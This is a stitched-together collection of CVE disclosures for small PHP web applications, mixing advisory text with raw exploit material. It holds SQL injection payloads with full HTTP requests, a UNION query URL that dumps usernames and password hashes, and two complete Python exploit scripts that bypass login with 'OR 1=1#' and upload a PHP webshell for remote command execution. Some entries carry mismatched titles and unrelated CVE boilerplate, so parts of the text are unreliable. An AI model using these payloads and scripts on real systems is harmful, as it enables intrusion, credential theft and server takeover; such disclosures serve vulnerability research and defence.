Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/sales/receipt.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/sales/receipt.php?id=

Vulnerability location: /ffos/admin/sales/receipt.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/sales/receipt.php?id=10%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/sales/receipt.php?id\=10%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 7417 

When length (database ()) = 7, Content-Length: 8389

CVE-2022-32333: bug_report/SQLi-3.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/classes/Master.php?f=delete_menu.

Permalink

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/classes/Master.php?f=delete\_menu

Vulnerability location: /ffos/classes/Master.php?f=delete\_menu, id

dbname = ffos\_db

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ffos/classes/Master.php?f\=delete\_menu HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ffos/admin/?page=menus
Content-Length: 65
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32330: bug_report/SQLi-2.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/categories/manage_category.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/categories/manage\_category.php?id=

Vulnerability location: /ffos/admin/categories/manage\_category.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/categories/manage\_category.php?id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/categories/manage\_category.php?id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 2421 

When length (database ()) = 7, Content-Length: 2561

CVE-2022-32334: bug_report/SQLi-5.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/menus/view_menu.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/menus/view\_menu.php?id=

Vulnerability location: /ffos/admin/menus/view\_menu.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/menus/view\_menu.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/menus/view\_menu.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 1015 

When length (database ()) = 7, Content-Length: 950

CVE-2022-32336: bug_report/SQLi-6.md at main · k0xx11/bug_report

A vulnerability was found in Microsoft O365 and classified as critical. This issue affects the Conditional Access Policy which leads to improper access controls. By default the policy is not verified for every request. The attack may be initiated remotely. Exploit details have been disclosed to the public. It is recommended to change the configuration settings. NOTE: Vendor claims that pre-requisites are very high, the feature works as intended, and that configuration settings might mitigate the issue.

CVE-2022-2077: Suspected Russian Activity Targeting Government and Business Entities Around the Globe

**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220412**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220412)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-29143: Microsoft SQL Server Remote Code Execution Vulnerability

Online Fire Reporting System v1.0 was discovered to contain a SQL injection vulnerability via the GET parameter in /report/list.php.

**May 21, 2022**

Product

Online Fire Reporting System

Product Link

Link

Vulnerability

SQL Injection

Severity

Critical

**Overview**

SQL Injection is an attack where an attacker can maliciously inject their own code into a SQL query. This can lead to the attacker being able to dump arbitary data from the database.

The vulnerability is a result of using non-parameterised queries when fetching search results on the report search page inside the /report/list.php file.

    <?php
    if(isset($_GET['search'])):
    $i = 1;
    $qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
    while($row = $qry->fetch_assoc()):
    ?>
    

As the GET parameters provided by the user are not sanitised or parameterised, a user can inject their own query and end their query in a semicolon and a SQL comment, removing the end of the query and being able to control what data is returned.

This can be used to exfiltrate the username and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, these passwords would be very easy to crack through brute force.

POC Url:

    http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-
    

The application should use parameterised queries to ensure that any user input is properly escaped.

CVE-2022-31415: SQL Injection - Online Fire Reporting System - ResearchInTheBin

The South Gate Inn Online Reservation System v1.0 contains an SQL injection vulnerability that can be chained with a malicious PHP file upload, which is caused by improper file handling in the editImg function. This vulnerability leads to remote code execution.

\# Exploit Title: South Gate Inn Online Reservation System v1.0 - Remote Code Execution \# Date: 21.09.2021 \# Exploit Author: Janik Wehrli \# Vendor Homepage: https://www.sourcecodester.com/php/10584/south-gate-inn-online-reservation-system.html \# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/southgateinn.zip \# Version: 1.0 \# Tested On: Ubuntu 18.04,Windows 10 + XAMPP 7.4 #Description: \# The South Gate Inn Online Reservation System suffers from an SQLi authentication Bypass which leads to Admin access on the application. \# From there it's possible to upload a malicious PHP file to the server by changing a Room Image (getimagesize PHP function bypass). \# Both SQL queries and file validations are not handled properly, which leaves the Webserver in a vulnerable state. \# The impact of this vulnerability is the compromise of the Webserver. import requests, sys from colorama import Fore, Back, Style requests.packages.urllib3.disable\_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F \= \[Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE\] B \= \[Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE\] S \= \[Style.RESET\_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT\] info \= S\[3\] + F\[5\] + '\[' + S\[0\] + S\[3\] + '-' + S\[3\] + F\[5\] + '\]' + S\[0\] + ' ' err \= S\[3\] + F\[2\] + '\[' + S\[0\] + S\[3\] + '!' + S\[3\] + F\[2\] + '\]' + S\[0\] + ' ' ok \= S\[3\] + F\[3\] + '\[' + S\[0\] + S\[3\] + '+' + S\[3\] + F\[3\] + '\]' + S\[0\] + ' ' ASCII\_ART \= """ \_.---.\_ /\\\\ ./' "--\`\\// ./ o \\ /./\\ )\_\_\_\_\_\_ \\\_\_ \\ ./ / /\\ \\ | \\ \\ \\ \\ / / \\ \\ | |\\ \\ \\7 " " " " SouthGateInn RCE v1.0 Janik Wehrli """ \# Set variables print(ASCII\_ART) SERVER\_URL \= str( input("Type in your SouthGateInn System v1.0 Location e.g http://192.168.20.20/southgateinn/SouthGateInn: \\n")) LOGIN\_URL \= SERVER\_URL + '/admin/login.php' UPLOAD\_URL \= SERVER\_URL + "/admin/mod\_room/controller.php?action=editimage" PWN\_URL \= SERVER\_URL + "/admin/mod\_room/rooms/" USERNAME \= "'OR 1=1#" PASSWORD \= "PWNED" WEBSHELL\_NAME \= "pwn.php" \# Uncomment the bottom line to run the exploit through a proxy such as burp \# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} \# Create a simple web session with python s \= requests.Session() \# GET request to webserver - Start a session & retrieve a session cookie get\_session \= s.get(LOGIN\_URL, verify\=False) \# Check connection to website & print session cookie to terminal OR die if get\_session.status\_code \== 200: print(ok + 'Successfully connected to SouthGateInn System v1.0 server & created session.') print(info + "Session Cookie: " + get\_session.headers\['Set-Cookie'\]) else: print(err + 'Cannot connect to the server and create a web session.') sys.exit(\-1) \# 1. Bypass Login to get Admin access \# POST data to bypass Authentication via SQL Injection login\_data \= {'username': USERNAME, 'password': PASSWORD, 'login': ''} print( info + "Attempting to Login to SouthGateInn System v1.0 the following payload: " + "username:" + USERNAME + ":" + "password:" + PASSWORD) \# auth = s.post(url=LOGIN\_URL, data=login\_data, verify=False, proxies=proxies) auth \= s.post(url\=LOGIN\_URL, data\=login\_data, verify\=False, allow\_redirects\=True) if auth.status\_code \== 200: print(ok, "Login Success") else: print(err, "Something Went Wrong") \# 2. Upload simple PHP Webshell to get command execution \# Content-Disposition: form-data; name="image"; filename="pwn.php" \# Content-Type: application/octet-stream webshell \= { 'image': ( WEBSHELL\_NAME, 'GIF89a <?php echo shell\_exec($\_GET\["cmd"\]);?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } print(info + "Upload Webshell via insecure verification of images (getimagesize()) add GIF Magic Bytes") print(info + "Send Post malicious POST Request to the Server") upload\_webshell \= s.post(url\=UPLOAD\_URL, files\=webshell, verify\=False) if "window.location='index.php'" in upload\_webshell.text: print(ok, "Success") print(ok, "Your Webshell is located under: " + PWN\_URL + WEBSHELL\_NAME) print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN\_URL + WEBSHELL\_NAME + "?cmd=whoami") else: print(err, "Something Went Wrong")

CVE-2021-41662: 0dayHunt/SouthGateInn_RCE.py at main · janikwehrli1/0dayHunt

Church Management System version 1.0 is affected by a SQL anjection vulnerability through creating a user with a PHP file as an avatar image, which is accessible through the /uploads directory. This can lead to RCE on the web server by uploading a PHP webshell.

\# Exploit Title: Church Management System 1.0 - Authentication Bypass via SQLi + RCE \# Date: 21.09.2021 \# Exploit Author: Janik Wehrli \# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html \# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church\_management\_1.zip \# Version: 1.0 \# Tested On: Ubuntu ,Windows 10 + XAMPP 7.4 \# Description: Church Management System (CMS-Website) 1.0 suffers from an Authentication Bypass Vulnerability which gives access to the Admin Account. The Admin Dashboard allows us to upload a PHP webshell by creating a new user with a malicious Avatar Image. import requests, sys from colorama import Fore, Back, Style from bs4 import BeautifulSoup requests.packages.urllib3.disable\_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F \= \[Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE\] B \= \[Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE\] S \= \[Style.RESET\_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT\] info \= S\[3\] + F\[5\] + '\[' + S\[0\] + S\[3\] + '-' + S\[3\] + F\[5\] + '\]' + S\[0\] + ' ' err \= S\[3\] + F\[2\] + '\[' + S\[0\] + S\[3\] + '!' + S\[3\] + F\[2\] + '\]' + S\[0\] + ' ' ok \= S\[3\] + F\[3\] + '\[' + S\[0\] + S\[3\] + '+' + S\[3\] + F\[3\] + '\]' + S\[0\] + ' ' ASCII\_ART \= """ \_\_\_\_\_ \_ \_ \_\_ \_\_ \_ \_\_\_\_\_ \_\_ \_\_ \_\_\_\_\_ / \_\_\_\_| | | | | \\/ | | | / \_\_\_\_| \\/ |/ \_\_\_\_| | | | |\_\_ \_ \_ \_ \_\_ \_\_\_| |\_\_ | \\ / | \_\_ \_ \_ \_\_ \_\_\_ | |\_ | | | \\ / | (\_\_\_ | | | '\_ \\| | | | '\_\_/ \_\_| '\_ \\ | |\\/| |/ \_\` | '\_ \` \_ \\| \_\_| | | | |\\/| |\\\_\_\_ \\ | |\_\_\_\_| | | | |\_| | | | (\_\_| | | | | | | | (\_| | | | | | | |\_ | |\_\_\_\_| | | |\_\_\_\_) | \\\_\_\_\_\_|\_| |\_|\\\_\_,\_|\_| \\\_\_\_|\_| |\_| |\_| |\_|\\\_\_, |\_| |\_| |\_|\\\_\_| \\\_\_\_\_\_|\_| |\_|\_\_\_\_\_/ \_\_/ | V.1.0 https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html Exploit by Janik Wehrli """ \# Set variables print(ASCII\_ART) SERVER\_URL \= str(input("Type in your Church Manangement System URL e.g http://192.168.20.20: \\n")) LOGIN\_URL \= SERVER\_URL + '/church\_management/classes/Login.php?f=login' UPLOAD\_URL \= SERVER\_URL + "/church\_management/classes/Users.php?f=save" PWN\_URL \= SERVER\_URL + "/church\_management/uploads/" USERNAME \= "'OR 1=1#" PASSWORD \= "PWNED" WEBSHELL\_NAME \= "" \# Uncomment the bottom line to run the exploit through a proxy such as burp \# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} \# Create a simple web session with python s \= requests.Session() \# GET request to webserver - Start a session & retrieve a session cookie get\_session \= s.get(LOGIN\_URL, verify\=False) \# Check connection to website & print session cookie to terminal OR die if get\_session.status\_code \== 200: print(ok + 'Successfully connected to Church Management CMS server & created session.') print(info + "Session Cookie: " + get\_session.headers\['Set-Cookie'\]) else: print(err + 'Cannot connect to the server and create a web session.') sys.exit(\-1) \# 1. Bypass Login \# POST data to bypass Authentication via SQL Injection login\_data \= {'username': USERNAME, 'password': PASSWORD, 'login': ''} print(info + "Attempting to Login to Church Management v1.0 the following payload: "+ "username:" + USERNAME + ":" + "password:"+ PASSWORD) \# auth = s.post(url=LOGIN\_URL, data=login\_data, verify=False, proxies=proxies) auth \= s.post(url\=LOGIN\_URL, data\=login\_data, verify\=False, allow\_redirects\=True) if auth.status\_code \== 200: print(ok, "Success") else: print(err, "Something Went Wrong") \# 2. Upload Webshell \# Content-Disposition: form-data; name="img"; filename="pwn.php" \# Content-Type: application/octet-stream webshell \= { 'img': ( 'pwn.php', '6 a $2y$10$Nw16tMpX3SyhtPrhBMD1Ku4jntwsRyQOANFs3.Ikv8eXpoQ0RL9PK\\n <?php echo shell\_exec($\_GET\["cmd"\]);?> \\n', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } fdata \= {'firstname': 'test2', 'lastname': 'test2', 'username': 'test2', 'password': 'test2'} print(info + "Exploiting Church Management v1.0 file upload vulnerability via User Avatar to upload a PHP webshell") \# upload\_webshell = s.post(url=UPLOAD\_URL, files=websh, data=fdata, verify=False, proxies=proxies) upload\_webshell \= s.post(url\=UPLOAD\_URL, files\=webshell, data\=fdata, verify\=False) if upload\_webshell.status\_code \== 200: print(ok, "Success") else: print(err, "Something Went Wrong") uploaded\_site \= requests.get(PWN\_URL) soup \= BeautifulSoup(uploaded\_site.content, 'html.parser') for a in soup.find\_all('a', href\=True): b \= a\['href'\] if "php" in b: WEBSHELL\_NAME \= b break if upload\_webshell.status\_code \== 200: print(ok, "Your Webshell is located under: "+ PWN\_URL + WEBSHELL\_NAME) print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN\_URL + WEBSHELL\_NAME+"?cmd=whoami") else: print(err, "Something went wrong") dates \= soup.findAll("href")

CVE-2021-41661: 0dayHunt/Church_Managementv1.0_RCE.py at main · janikwehrli1/0dayHunt

A Server-Side Request Forgery (SSRF) vulnerability in IPS Community Suite before 4.6.2 allows remote authenticated users to request arbitrary URLs or trigger deserialization via phar protocol when generating class names dynamically. In some cases an exploitation is possible by an unauthenticated user.

Tag

#sql